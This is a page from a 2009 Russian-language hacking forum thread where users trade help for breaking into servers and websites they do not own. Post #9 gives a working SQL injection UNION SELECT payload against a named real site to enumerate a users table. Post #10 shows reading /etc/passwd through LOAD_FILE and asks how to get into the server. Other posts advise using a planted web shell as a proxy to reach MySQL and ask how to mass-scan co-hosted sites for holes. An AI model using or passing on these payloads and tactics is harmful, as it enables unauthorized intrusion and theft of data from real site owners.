HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 859 из 2422 « Первая < 359759809849 855 856 857 858 859 860 861 862 863 86990995913591859 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.08.2009, 22:22
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию
Цитата:
Сообщение от jangle  
2 Byrger
А что ты сам хочешь от сервака? Какая цель конечная?

Вариант - читать файлы в таблицу и просматривая их двигаться дальше
Рутовский пас пробуй с логином Administrator (если винда) к имеющимся сервисам - FTP, RDP etc
Надо слить файлы оттуда
Просканих xSpider`ом открыто 3 покта
2 это 2 для этого ПО
1 это MySQL

Может можно как-то просмотреть где находятся файлы...и слить?
 
Ответить с цитированием

  #2  
Старый 26.08.2009, 22:43
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию
Да если есьт шелл на http серваке, ставь проксю его, FreeCap на удалённый менеджер mYSQL
Думаю юзера и пасс знаешь.
Если знаешь то впустит.
 
Ответить с цитированием

  #3  
Старый 26.08.2009, 22:46
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию
есть сайт, на котором лично я ничего не нашел, ни одной дырочки. Но на том же ИП крутиться еще более 200 сайтов. Как просканить эти сайты на уязвимости автоматически,ибо вручную не хватит и всей жизни.
 
Ответить с цитированием

  #4  
Старый 26.08.2009, 22:50
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию
Цитата:
Сообщение от jecka3000  
есть сайт, на котором лично я ничего не нашел, ни одной дырочки. Но на том же ИП крутиться еще более 200 сайтов. Как просканить эти сайты на уязвимости автоматически,ибо вручную не хватит и всей жизни.
Вручную парниш
Рандомом выбери и посмотри.
Или же смотри на античате в скулях или инклюдах.
 
Ответить с цитированием

  #5  
Старый 26.08.2009, 23:06
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию
Говорил с суппортом одного хостинга, он говорит, что в современных хостах все акки изолированны друг от друга, что взлом через смежные сайты невозможен. Правда это или гон?
 
Ответить с цитированием

  #6  
Старый 26.08.2009, 23:33
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию
Цитата:
Сообщение от jecka3000  
Говорил с суппортом одного хостинга, он говорит, что в современных хостах все акки изолированны друг от друга, что взлом через смежные сайты невозможен. Правда это или гон?
Как пафосно то реклама не более. Всё зависит от хостера... Что значит "в современных хостах"? Он тебе описал скорее не "современные хосты", а то как должно быть у нормального хостера... а дебилы, как были, так и будут, хоть у "современных", хоть у "старомодных" хостеров...
 
Ответить с цитированием

  #7  
Старый 26.08.2009, 23:34
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
Правда конечно. Что ты
 
Ответить с цитированием

  #8  
Старый 26.08.2009, 23:53
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию
очень прошу помочь раскрутить скулю: http://www.poraduy.ru/catalog/?id=99'
 
Ответить с цитированием

  #9  
Старый 27.08.2009, 00:03
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию
Цитата:
Сообщение от jecka3000  
очень прошу помочь раскрутить скулю: http://www.poraduy.ru/catalog/?id=99'
http://www.poraduy.ru/catalog/?id=-99+union+select+group_concat(column_name+separator +0x0a)+from+information_schema.columns+where+table _name=0x70687062625f61636c5f7573657273
 
Ответить с цитированием

  #10  
Старый 27.08.2009, 00:13
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию
Сделал запрос в ту маштнку такого вида
Цитата:
SELECT 1,2,3,LOAD_FILE('../../../etc/passwd'),5,6,7 FROm access
Мне выдался passwd как с помошью него можно на сервер залезть?

Пытался через Pytty подключится но сказал типо сервер недоступен...даже не спросил логин
 
Ответить с цитированием
Ответ
Страница 859 из 2422 « Первая < 359759809849 855 856 857 858 859 860 861 862 863 86990995913591859 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ